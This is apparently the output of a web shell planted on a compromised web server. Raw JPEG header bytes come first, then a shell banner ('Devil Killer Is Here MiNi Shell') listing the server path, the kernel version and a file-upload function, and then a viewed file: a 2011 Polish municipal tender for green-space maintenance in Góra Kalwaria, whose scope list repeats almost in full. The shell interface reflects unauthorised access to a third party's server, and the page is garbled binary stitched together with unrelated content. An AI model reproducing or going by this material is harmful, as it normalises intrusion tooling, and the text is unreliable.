JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110321/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110321/91395-N-2011.html

<p class="kh_header"><b>Góra Kalwaria: Pielęgnacja zieleni Miasta i Gminy Góra Kalwaria na rok 2011.</b><br>
<b>Numer ogłoszenia: 91395 - 2011; data zamieszczenia: 21.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta i Gminy Góra Kalwaria , ul. 3 Maja 10, 05-530 Góra Kalwaria, woj. mazowieckie, tel. 0-22/7273414, faks 0-22/7273414.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gorakalwaria pl.</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pielęgnacja zieleni Miasta i Gminy Góra Kalwaria na rok 2011..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Pielęgnacja trawników na skwerach miejskich o łącznej powierzchni ok. 9 500m2.
Zakres prac:
1.1	wiosenne    przygotowanie   powierzchni    trawiastych ( usunięcie zanieczyszczeń pozimowych, wertykulacja trawników )
1.2	dosiewki ubytków trawnika (w razie stwierdzenia pojawienia się ubytków w trawniku (np. przedepty) należy niezwłocznie wykonać  dosiewkę mieszanki nasion traw wraz ze ściółkowaniem całej regenerowanej powierzchni trawnika centymetrową warstwą substratu torfowego) 
1.3	nawożenie (dwukrotne zasilenie trawników nawozami wieloskładnikowymi marzec-kwiecień i lipiec-sierpień)
1.4	koszenie (koszenie na wysokość 3,5 do 5 cm, zabieg należy wykonywać najpóźniej  gdy trawa osiągnie dwukrotność docelowej wysokości czyli max. 7 do 10 cm, koszenie zawsze suchego trawnika z  natychmiastowym wywozem urobku) co można orientacyjnie przeliczyć na ok. 26-30 cykli koszenia(1koszenie/5-7dni w czasie okresu wegetacyjnego) 
1.5	usuwanie roślinności konkurencyjnej (w razie konieczności, gdy chwasty uniemożliwiają prawidłowy rozrost darni należy zastosować herbicyd selektywny)
1.6	podlewanie (w okresach suszy zagrażającej prawidłowemu rozwojowi darni lub w razie bezdeszczowej pogody po nawożeniu)
1.7	jesienne przygotowanie powierzchni trawiastych (usunięcie opadających liści drzew, pozostawienie na zimę trawy skoszonej na wys. 2,5 do 3,5 cm.)

Dotyczy obiektów:
I.	skwer przy Ratuszu Miejskim,                      			2500 m2 
II.	Plac Piłsudskiego,                                          			  700 m2
III.	skwer przy ul. Ks. Sajny,                               			1100 m2
IV.	skwer przy ul. Dominikańskiej, 					1250 m2
V.	trawnik przy parkingu ul. Dominikańska 2/4, 			  300 m2
VI.	skwer przy ul. Dominikańskiej 2/4, 					1750 m2
VII.	skwer na Rynku w Czersku, 						1500 m2
VIII.	trawniki przy ul. 3-go Maja,						  300 m2 
IX.	trawniki przy ul. Piłsudskiego,					  100 m2 

2.Pielęgnacja trawników towarzyszących ciągom komunikacyjnym o łącznej powierzchni ok. 20 550 m2
Zakres prac:
2.1 wiosenne    przygotowanie   powierzchni    trawiastych ( usunięcie zanieczyszczeń pozimowych, głębokie grabienie trawników)
2.2koszenie (koszenie na wysokość 5 do 7,5 cm, zabieg 
należy wykonywać najpóźniej  gdy trawa osiągnie 
dwukrotność docelowej wysokości czyli max. 10 do 15 cm, 
koszenie zawsze suchego trawnika z  wywozem urobku) co
można orientacyjnie przeliczyć na ok. 12-15 cykli 
koszenia(1koszenie/10-14dni w czasie okresu wegetacyjnego) 
2.3	jesienne przygotowanie powierzchni trawiastych (usunięcie opadających liści drzew, pozostawienie na zimę trawy skoszonej na wys. 2,5 do 3,5 cm.)
Dotyczy obiektów:
I.skwer przy Rondzie im. Kazimierza Górskiego,			   3200 m2 
II.	trawnik przed Sądem Rejonowym przy ul. Dominikańskiej, 	     900 m2 
III.	trawnik wokół krzyża, wzdłuż chodnika przy ul. Skierniewickiej od      
strony północnej do ulicy i od południowej na odległość ok. 2m,       1800 m2 
IV.	trawniki Skarpy Wiślanej wzdłuż ścieżki widokowej na tyłach 
         Przedszkola Samorządowego i Zespołu Szkół Ogólnokształcących przy 
         ul. Ks. Sajny    800 m2 
V.	trawnik w pasie ul. Pijarskiej   3800 m2 
VI.	trawnik w pasie ul. Dominikańskiej, 			500 m2 
VII.	trawnik w pasie ul. Wojska Polskiego do końca ogrodzenia Stadionu  
         Miejskiego, 						   1300 m2 
VIII.	trawnik w pasie ul. Kalwaryjskiej, 		                2300 m2 
IX.	trawnik w pasie ul. Chopina, 				 900 m2 
X.	trawnik w pasie ul. Ks. Sajny, 			 1300 m2 
XI.	trawnik w pasie ul. Wierzbowskiego, 			     400 m2 
XII.	trawnik ul. Pijarskiej przed Spółdzielnią Mieszkaniową,	     600 m2 
XIII.	trawniki  na  wysepkach ul.  Pijarska/Wyszyńskiego i  ul. Pijarska/Skierniewicka,					  500 m2 

XIV.	trawniki przy ul. Białka				   200 m2 
XV.	trawniki przy ul. Skierniewickiej			   450 m2 
XVI.	trawniki przy ul. Sportowej		                             750 m2 
XVII. trawniki przy ul. Kilińskiego		                             850 m2 




3.       Pielęgnacja nasadzeń żywopłotowych o łącznej długości     
           ok. 830 mb.
Zakres prac:

3.1cięcia kształtujące (trzykrotne w czasie sezonu   
wegetacyjnego np. maj/czerwiec i lipiec/sierpień, wrzesień/październik).
	
    
Dotyczy obiektów:
I.	skwer przy Ratuszu Miejskim,                      		     40 mb 
II.	Plac Piłsudskiego,                                          	   140 mb
III.	skwer przy ul. Ks. Sajny,                                                 90 mb
IV.	skwer przy ul. Dominikańskiej, 			   180 mb   
V.	skwer przy ul. Dominikańskiej 2/4,                                    305 mb
VI.	nasadzenia przed Pałacem Biskupim oraz przy skrzyżowaniu ul. Sajny   
          z ul. 3-go Maja,				   	  40 mb
VII.	 klomb przed bramą Domu Pomocy Społecznej 		      20 mb
VIII.	żywopłot przy ul. Wierzbowskiego			15 mb 



4.      Pielęgnacja drzew i krzewów.
Zakres prac:

 4.1	cięcia techniczne (w razie konieczności, ograniczające 
            rośliny w zakresie ciągów  komunikacyjnych, budynków) 
4.2       cięcia pielęgnacyjne (usuwanie posuszu, gałęzi    
            złamanych, przekwitniętych kwiatostanów) 
4.3      usuwanie odrostów korzeniowych i u podstawy pnia

	Dotyczy obiektów:
I.	 skwer przy Ratuszu Miejskim,                      			 
II.	 Plac Piłsudskiego,                                          			  
III.	 skwer przy ul. Ks. Sajny,                               			
IV.	 skwer przy ul. Dominikańskiej wraz z terenem byłej stacji paliw, 
V.	 trawnik przy parkingu ul. Dominikańska 2/4, 			  
VI.	 skwer przy ul. Dominikańskiej 2/4, 					
VII.	 skwer na Rynku w Czersku,						
VIII.	 trawniki przy ul. 3-go Maja,						 
IX. skwer przy Rondzie im. Kazimierza Górskiego,			   
X. Skarpa Wiślana wzdłuż ścieżki widokowej na tyłach Przedszkola  
Samorządowego i Zespołu Szkół Ogólnokształcących przy ul. Ks.  Sajny,	 
XI.	 nasadzenia w pasie ul. Pijarskiej, 					            
XII.	 nasadzenia w pasie ul. Dominikańskiej,  				     
XIII.	 nasadzenia w pasie ul. Kalwaryjskiej,  				            
XIV.  nasadzenia w pasie ul. Ks. Sajny, 
XV.   nasadzenia w pasie ul. Wierzbowskiego, 
XVI.   nasadzenia w pasie ul. Piłsudskiego, 
XVII    nasadzenia ul. Pijarskiej przed Spółdzielnią Mieszkaniową,
XVIII. nasadzenia w pasie ul. 3-go Maja,
XIX.   rabaty w podwórzu Ratusza,	     


5.   Pielęgnacja nawierzchni utwardzonych.
Zakres prac:

5.1usuwanie roślinności wrastającej w nawierzchnię
     	
     Dotyczy obiektów:
I. skwer przed Ratuszem Miejskim,                      			 
II. Plac Piłsudskiego,                                          			  
III. skwer przy ul. Ks. Sajny,                               			
IV. skwer przy ul. Dominikańskiej, 
V. skwer na Rynku w Czersku, 						


6.  Pielęgnacja nawierzchni nieutwardzonych.
Zakres prac:

6.1 usuwanie roślinności wrastającej w nawierzchnię
6.2 nadawanie odpowiedniego profilu nawierzchni
	

Dotyczy obiektów:
I. alejki skweru przy ul. Dominikańskiej 2/4, 				
II. nawierzchnia ścieżki widokowej wzdłuż Skarpy Wiślanej na tyłach  
 Przedszkola Samorządowego i Zespołu Szkół Ogólnokształcących przy           
ul. Ks. Sajny,	 
III. plac na skwerze przy ul. Dominikańskiej, 

7.   Pielęgnacja nasadzeń w gazonach.
Zakres prac:
7.1    wykonywanie cięć pielęgnacyjnych i technicznych krzewów
7.2    ściółkowanie powierzchni nasadzeń
7.3    odchwaszczanie powierzchni nasadzeń
7.4    podlewanie (w okresach suszy zagrażającej prawidłowemu rozwojowi roślin lub w razie bezdeszczowej pogody po  nawożeniu)
	
Dotyczy obiektów:
I.	      gazony ul. 3-go Maja,
II.	      Rondo im. Kazimierza Górskiego,
III.	 klomb przed bramą Domu Pomocy Społecznej 			  
8.     Pielęgnacja rabat kwiatowych.
Zakres prac:
8.1         dwukrotne wykonanie nasadzeń łącznie 800 szt. zielnych roślin kwiatowych
8.2        zakup donicy kaskadowej  i wykonanie nasadzeń 80szt. 
 roślin kwiatowych o pokroju zwisłym według specyfikacji z załącznika 8a - dotyczy kwiatowej kompozycji kaskadowej w centralnej części Skweru przed  Ratuszem
8.3  pielęgnacja wykonanych nasadzeń (podlewanie,   nawożenie, stosowanie niezbędnych oprysków, wymiana   roślin tracących walory dekoracyjne, usuwanie 
chwastów)
	
Dotyczy obiektów:
I.  gazony ul. 3-go Maja, 
II. rabaty przy  Ul. Kalwaryjskiej,
III.centralna część Skweru przy ul. Ks. Sajny,
IV. kompozycje kwiatowe w gazonach na skwerze przed Ratuszem, 
V. Rondo im. Kazimierza Górskiego,
VI. donice na skwerze przy ul. Dominikańskiej,

9.  Dekoracja wskazanych 49 szt. latarni ulicznych  zwisłymi roślinami kwiatowymi i utrzymanie ich walorów dekoracyjnych od 16 maja do 30 września.
Zakres prac:
9.1   zakup i instalacja doniczek plastikowych połączonych w    
sposób demontowalny ze wskazanymi latarniami ulicznymi według specyfikacji z załącznika 9a - dotyczy ukwiecenia latarni w centralnej części miasta
9.2   nasadzenie 392 szt. sadzonek roślin kwiatowych o  pokroju zwisłym
9.3    pielęgnacja wykonanych dekoracji (podlewanie,  nawożenie, stosowanie niezbędnych oprysków, wymiana roślin tracących walory dekoracyjne)
Dotyczy obiektów:
I.    latarnie ul. 3-go Maja - strona północna            11szt.,
II.   latarnie ul. Dominikańskiej - strona wschodnia 10szt.,
III.  latarnie ul. Piłsudskiego - strona południowa      8szt.,
IV.  latarnie na Placu  Piłsudskiego                            4szt.,	
IV.  skwer na Rynku w Czersku                                 4szt.,
V.   latarnie ul. Ks. Sajny przed Pałacem Biskupim    4szt.,
VI.  Skwer przed Ratuszem                                         8szt.,



10.     Wykonanie nasadzeń dodatkowych
Zakres prac:
10.1         wykonanie nasadzeń  30 szt. drzew według specyfikacji    
z załącznika 10a - dotyczy ul. Piłsudskiego, Kalwaryjskiej,
 10b - dotyczy ul. Wojska Polskiego,
 10.2	wykonanie nasadzeń 970 szt. krzewów  według specyfikacji z załącznika  10c - dotyczy zieleńców przed      
 Pałacem Biskupim, ul. Sajny,  10d - dotyczy skweru na Rynku  
w Czersku,  10e - dotyczy ul. Dominikańskiej   przed Rondem im. K. Górskieg
 10.3	dosiewki trawników 600 m2  według specyfikacji z załącznika 10b - dotyczy ul. Wojska Polskiego,
10.4	założenie trawników 450 m2  według specyfikacji z załącznika 10f - dotyczy ul. Skierniewickiej,

	
Dotyczy obiektów:
I.          gazony ul. 3-go Maja,
II      ul. Piłsudskiego, przy kościele,
III.     ul. Wojska Polskiego na odcinku rondo - ul. 11-go Listopada, 	
IV.     skwer na Rynku w Czersku,
V.      ul. Ks. Sajny przed Pałacem Biskupim,
VI.     ul. Dominikańska przy Rondzie im. Kazimierza Górskiego, 
VII.    ul. Kalwaryjska, przed szkołą podstawową, 
VIII.   ul. Skierniewicka, przy parkingu, 

Rośliny wymagane do wykonania nasadzeń, nasiona traw,  chemiczne   środki   ochrony   roślin   i   nawozy   - (po uzgodnieniu i akceptacji inwestora) materiał własny wykonawcy.
Wywóz i utylizacja urobku - w zakresie i na koszt wykonawcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Pielęgnacja trawników na skwerach miejskich o łącznej powierzchni ok. 9 500m2.
Zakres prac:
1.1	wiosenne    przygotowanie   powierzchni    trawiastych ( usunięcie zanieczyszczeń pozimowych, wertykulacja trawników )
1.2	dosiewki ubytków trawnika (w razie stwierdzenia pojawienia się ubytków w trawniku (np. przedepty) należy niezwłocznie wykonać  dosiewkę mieszanki nasion traw wraz ze ściółkowaniem całej regenerowanej powierzchni trawnika centymetrową warstwą substratu torfowego) 
1.3	nawożenie (dwukrotne zasilenie trawników nawozami wieloskładnikowymi marzec-kwiecień i lipiec-sierpień)
1.4	koszenie (koszenie na wysokość 3,5 do 5 cm, zabieg należy wykonywać najpóźniej  gdy trawa osiągnie dwukrotność docelowej wysokości czyli max. 7 do 10 cm, koszenie zawsze suchego trawnika z  natychmiastowym wywozem urobku) co można orientacyjnie przeliczyć na ok. 26-30 cykli koszenia(1koszenie/5-7dni w czasie okresu wegetacyjnego) 
1.5	usuwanie roślinności konkurencyjnej (w razie konieczności, gdy chwasty uniemożliwiają prawidłowy rozrost darni należy zastosować herbicyd selektywny)
1.6	podlewanie (w okresach suszy zagrażającej prawidłowemu rozwojowi darni lub w razie bezdeszczowej pogody po nawożeniu)
1.7	jesienne przygotowanie powierzchni trawiastych (usunięcie opadających liści drzew, pozostawienie na zimę trawy skoszonej na wys. 2,5 do 3,5 cm.)

Dotyczy obiektów:
I.	skwer przy Ratuszu Miejskim,                      			2500 m2 
II.	Plac Piłsudskiego,                                          			  700 m2
III.	skwer przy ul. Ks. Sajny,                               			1100 m2
IV.	skwer przy ul. Dominikańskiej, 					1250 m2
V.	trawnik przy parkingu ul. Dominikańska 2/4, 			  300 m2
VI.	skwer przy ul. Dominikańskiej 2/4, 					1750 m2
VII.	skwer na Rynku w Czersku, 						1500 m2
VIII.	trawniki przy ul. 3-go Maja,						  300 m2 
IX.	trawniki przy ul. Piłsudskiego,					  100 m2 

2.Pielęgnacja trawników towarzyszących ciągom komunikacyjnym o łącznej powierzchni ok. 20 550 m2
Zakres prac:
2.1 wiosenne    przygotowanie   powierzchni    trawiastych ( usunięcie zanieczyszczeń pozimowych, głębokie grabienie trawników)
2.2koszenie (koszenie na wysokość 5 do 7,5 cm, zabieg 
należy wykonywać najpóźniej  gdy trawa osiągnie 
dwukrotność docelowej wysokości czyli max. 10 do 15 cm, 
koszenie zawsze suchego trawnika z  wywozem urobku) co
można orientacyjnie przeliczyć na ok. 12-15 cykli 
koszenia(1koszenie/10-14dni w czasie okresu wegetacyjnego) 
2.3	jesienne przygotowanie powierzchni trawiastych (usunięcie opadających liści drzew, pozostawienie na zimę trawy skoszonej na wys. 2,5 do 3,5 cm.)
Dotyczy obiektów:
I.skwer przy Rondzie im. Kazimierza Górskiego,			   3200 m2 
II.	trawnik przed Sądem Rejonowym przy ul. Dominikańskiej, 	     900 m2 
III.	trawnik wokół krzyża, wzdłuż chodnika przy ul. Skierniewickiej od      
strony północnej do ulicy i od południowej na odległość ok. 2m,       1800 m2 
IV.	trawniki Skarpy Wiślanej wzdłuż ścieżki widokowej na tyłach 
         Przedszkola Samorządowego i Zespołu Szkół Ogólnokształcących przy 
         ul. Ks. Sajny    800 m2 
V.	trawnik w pasie ul. Pijarskiej   3800 m2 
VI.	trawnik w pasie ul. Dominikańskiej, 			500 m2 
VII.	trawnik w pasie ul. Wojska Polskiego do końca ogrodzenia Stadionu  
         Miejskiego, 						   1300 m2 
VIII.	trawnik w pasie ul. Kalwaryjskiej, 		                2300 m2 
IX.	trawnik w pasie ul. Chopina, 				 900 m2 
X.	trawnik w pasie ul. Ks. Sajny, 			 1300 m2 
XI.	trawnik w pasie ul. Wierzbowskiego, 			     400 m2 
XII.	trawnik ul. Pijarskiej przed Spółdzielnią Mieszkaniową,	     600 m2 
XIII.	trawniki  na  wysepkach ul.  Pijarska/Wyszyńskiego i  ul. Pijarska/Skierniewicka,					  500 m2 

XIV.	trawniki przy ul. Białka				   200 m2 
XV.	trawniki przy ul. Skierniewickiej			   450 m2 
XVI.	trawniki przy ul. Sportowej		                             750 m2 
XVII. trawniki przy ul. Kilińskiego		                             850 m2 




3.       Pielęgnacja nasadzeń żywopłotowych o łącznej długości     
           ok. 830 mb.
Zakres prac:

3.1cięcia kształtujące (trzykrotne w czasie sezonu   
wegetacyjnego np. maj/czerwiec i lipiec/sierpień, wrzesień/październik).
	
    
Dotyczy obiektów:
I.	skwer przy Ratuszu Miejskim,                      		     40 mb 
II.	Plac Piłsudskiego,                                          	   140 mb
III.	skwer przy ul. Ks. Sajny,                                                 90 mb
IV.	skwer przy ul. Dominikańskiej, 			   180 mb   
V.	skwer przy ul. Dominikańskiej 2/4,                                    305 mb
VI.	nasadzenia przed Pałacem Biskupim oraz przy skrzyżowaniu ul. Sajny   
          z ul. 3-go Maja,				   	  40 mb
VII.	 klomb przed bramą Domu Pomocy Społecznej 		      20 mb
VIII.	żywopłot przy ul. Wierzbowskiego			15 mb 



4.      Pielęgnacja drzew i krzewów.
Zakres prac:

 4.1	cięcia techniczne (w razie konieczności, ograniczające 
            rośliny w zakresie ciągów  komunikacyjnych, budynków) 
4.2       cięcia pielęgnacyjne (usuwanie posuszu, gałęzi    
            złamanych, przekwitniętych kwiatostanów) 
4.3      usuwanie odrostów korzeniowych i u podstawy pnia

	Dotyczy obiektów:
I.	 skwer przy Ratuszu Miejskim,                      			 
II.	 Plac Piłsudskiego,                                          			  
III.	 skwer przy ul. Ks. Sajny,                               			
IV.	 skwer przy ul. Dominikańskiej wraz z terenem byłej stacji paliw, 
V.	 trawnik przy parkingu ul. Dominikańska 2/4, 			  
VI.	 skwer przy ul. Dominikańskiej 2/4, 					
VII.	 skwer na Rynku w Czersku,						
VIII.	 trawniki przy ul. 3-go Maja,						 
IX. skwer przy Rondzie im. Kazimierza Górskiego,			   
X. Skarpa Wiślana wzdłuż ścieżki widokowej na tyłach Przedszkola  
Samorządowego i Zespołu Szkół Ogólnokształcących przy ul. Ks.  Sajny,	 
XI.	 nasadzenia w pasie ul. Pijarskiej, 					            
XII.	 nasadzenia w pasie ul. Dominikańskiej,  				     
XIII.	 nasadzenia w pasie ul. Kalwaryjskiej,  				            
XIV.  nasadzenia w pasie ul. Ks. Sajny, 
XV.   nasadzenia w pasie ul. Wierzbowskiego, 
XVI.   nasadzenia w pasie ul. Piłsudskiego, 
XVII    nasadzenia ul. Pijarskiej przed Spółdzielnią Mieszkaniową,
XVIII. nasadzenia w pasie ul. 3-go Maja,
XIX.   rabaty w podwórzu Ratusza,	     


5.   Pielęgnacja nawierzchni utwardzonych.
Zakres prac:

5.1usuwanie roślinności wrastającej w nawierzchnię
     	
     Dotyczy obiektów:
I. skwer przed Ratuszem Miejskim,                      			 
II. Plac Piłsudskiego,                                          			  
III. skwer przy ul. Ks. Sajny,                               			
IV. skwer przy ul. Dominikańskiej, 
V. skwer na Rynku w Czersku, 						


6.  Pielęgnacja nawierzchni nieutwardzonych.
Zakres prac:

6.1 usuwanie roślinności wrastającej w nawierzchnię
6.2 nadawanie odpowiedniego profilu nawierzchni
	

Dotyczy obiektów:
I. alejki skweru przy ul. Dominikańskiej 2/4, 				
II. nawierzchnia ścieżki widokowej wzdłuż Skarpy Wiślanej na tyłach  
 Przedszkola Samorządowego i Zespołu Szkół Ogólnokształcących przy           
ul. Ks. Sajny,	 
III. plac na skwerze przy ul. Dominikańskiej, 

7.   Pielęgnacja nasadzeń w gazonach.
Zakres prac:
7.1    wykonywanie cięć pielęgnacyjnych i technicznych krzewów
7.2    ściółkowanie powierzchni nasadzeń
7.3    odchwaszczanie powierzchni nasadzeń
7.4    podlewanie (w okresach suszy zagrażającej prawidłowemu rozwojowi roślin lub w razie bezdeszczowej pogody po  nawożeniu)
	
Dotyczy obiektów:
I.	      gazony ul. 3-go Maja,
II.	      Rondo im. Kazimierza Górskiego,
III.	 klomb przed bramą Domu Pomocy Społecznej 			  
8.     Pielęgnacja rabat kwiatowych.
Zakres prac:
8.1         dwukrotne wykonanie nasadzeń łącznie 800 szt. zielnych roślin kwiatowych
8.2        zakup donicy kaskadowej  i wykonanie nasadzeń 80szt. 
 roślin kwiatowych o pokroju zwisłym według specyfikacji z załącznika 8a - dotyczy kwiatowej kompozycji kaskadowej w centralnej części Skweru przed  Ratuszem
8.3  pielęgnacja wykonanych nasadzeń (podlewanie,   nawożenie, stosowanie niezbędnych oprysków, wymiana   roślin tracących walory dekoracyjne, usuwanie 
chwastów)
	
Dotyczy obiektów:
I.  gazony ul. 3-go Maja, 
II. rabaty przy  Ul. Kalwaryjskiej,
III.centralna część Skweru przy ul. Ks. Sajny,
IV. kompozycje kwiatowe w gazonach na skwerze przed Ratuszem, 
V. Rondo im. Kazimierza Górskiego,
VI. donice na skwerze przy ul. Dominikańskiej,

9.  Dekoracja wskazanych 49 szt. latarni ulicznych  zwisłymi roślinami kwiatowymi i utrzymanie ich walorów dekoracyjnych od 16 maja do 30 września.
Zakres prac:
9.1   zakup i instalacja doniczek plastikowych połączonych w    
sposób demontowalny ze wskazanymi latarniami ulicznymi według specyfikacji z załącznika 9a - dotyczy ukwiecenia latarni w centralnej części miasta
9.2   nasadzenie 392 szt. sadzonek roślin kwiatowych o  pokroju zwisłym
9.3    pielęgnacja wykonanych dekoracji (podlewanie,  nawożenie, stosowanie niezbędnych oprysków, wymiana roślin tracących walory dekoracyjne)
Dotyczy obiektów:
I.    latarnie ul. 3-go Maja - strona północna            11szt.,
II.   latarnie ul. Dominikańskiej - strona wschodnia 10szt.,
III.  latarnie ul. Piłsudskiego - strona południowa      8szt.,
IV.  latarnie na Placu  Piłsudskiego                            4szt.,	
IV.  skwer na Rynku w Czersku                                 4szt.,
V.   latarnie ul. Ks. Sajny przed Pałacem Biskupim    4szt.,
VI.  Skwer przed Ratuszem                                         8szt.,



10.     Wykonanie nasadzeń dodatkowych
Zakres prac:
10.1         wykonanie nasadzeń  30 szt. drzew według specyfikacji    
z załącznika 10a - dotyczy ul. Piłsudskiego, Kalwaryjskiej,
 10b - dotyczy ul. Wojska Polskiego,
 10.2	wykonanie nasadzeń 970 szt. krzewów  według specyfikacji z załącznika  10c - dotyczy zieleńców przed      
 Pałacem Biskupim, ul. Sajny,  10d - dotyczy skweru na Rynku  
w Czersku,  10e - dotyczy ul. Dominikańskiej   przed Rondem im. K. Górskieg
 10.3	dosiewki trawników 600 m2  według specyfikacji z załącznika 10b - dotyczy ul. Wojska Polskiego,
10.4	założenie trawników 450 m2  według specyfikacji z załącznika 10f - dotyczy ul. Skierniewickiej,

	
Dotyczy obiektów:
I.          gazony ul. 3-go Maja,
II      ul. Piłsudskiego, przy kościele,
III.     ul. Wojska Polskiego na odcinku rondo - ul. 11-go Listopada, 	
IV.     skwer na Rynku w Czersku,
V.      ul. Ks. Sajny przed Pałacem Biskupim,
VI.     ul. Dominikańska przy Rondzie im. Kazimierza Górskiego, 
VII.    ul. Kalwaryjska, przed szkołą podstawową, 
VIII.   ul. Skierniewicka, przy parkingu,</li></ul>
